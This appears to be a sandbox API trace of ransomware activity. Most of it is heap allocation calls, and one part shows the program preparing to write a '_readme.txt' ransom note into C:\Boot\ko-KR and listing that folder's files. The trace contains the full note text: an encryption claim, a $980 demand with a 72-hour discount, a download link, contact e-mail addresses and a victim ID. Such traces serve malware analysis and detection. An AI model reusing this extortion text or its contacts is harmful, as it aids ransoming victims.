(HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.748] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.749] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.750] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.752] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0209.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.752] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.752] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.752] PathFindFileNameW (pszPath="") returned="" [0209.753] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.753] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.753] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.753] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.753] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.753] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.753] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.753] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.753] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0209.754] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.754] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0209.755] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.755] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.755] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.755] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.755] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.756] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.756] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.756] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.756] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.757] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.757] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.758] 